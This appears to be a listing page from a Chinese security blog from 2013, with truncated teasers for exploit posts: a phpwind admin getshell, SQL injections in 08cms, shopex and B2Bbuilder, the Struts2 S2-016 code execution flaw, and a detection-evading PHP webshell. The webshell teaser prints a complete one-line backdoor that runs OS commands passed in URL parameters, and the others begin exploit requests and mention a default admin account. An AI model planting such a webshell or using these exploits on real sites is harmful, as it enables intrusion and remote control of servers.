phpwind后台getshell
- 2013-09-10
- 周边
后台上传插件处,可以上传一个包含php木马的phpwind标准格式插件安装包,并可getshell. 1.先制作一个安装包,需要包含一个manifest.xml文件和一个php一句话(...
08cms SQL 注入漏洞利用
- 2013-09-05
- Vulndb
来源:www.08sec.com 汽车的: /include/paygate/alipay/pays.php 1234567891011121314151617181920212223242526...
![河马php一句话木马[过狗版]v1.0](https://www.uedbox.com/wp-content/themes/UB2019/prcute.php?src=https://www.uedbox.com/wp-content/uploads/2013/08/tt.png&h=320=&w=380&zc=1)
河马php一句话木马[过狗版]v1.0
- 2013-08-17
- 周边
【河马】 php一句话木马服务端和客户端【免杀版】 软件是一个php脚本木马,将<?php echo $_GET[2]($_GET[0]($_GET[1]));?> 写入文件webshell.php中,然后使用软件进行连接,就可以执行OS命令, 支持的函数...
shopex 4.8.5 api.php注入漏洞0day exp
- 2013-08-05
- Vulndb
123456789 <form method='post' action='http://www.site.com/api.php?act=search_dly_type...
Struts2再爆远程代码执行漏洞(S2-016)
- 2013-07-20
- Vulndb
Struts又爆远程代码执行漏洞了!在这次的漏洞中,攻击者可以通过操纵参数远程执行恶意代码。Struts 2.3.15.1之前的版本,参数action的值redirect以及redirectAction没有正确过滤,导致ognl代码执行。 描述 影响...
B2Bbuilder注入漏洞+Exp+默认管理员帐号
- 2013-07-19
- Vulndb
测试的程序版本为:B2Bbuilder_v6.6 123 http://www.site.com/?m=offer&s=offer_list&i...
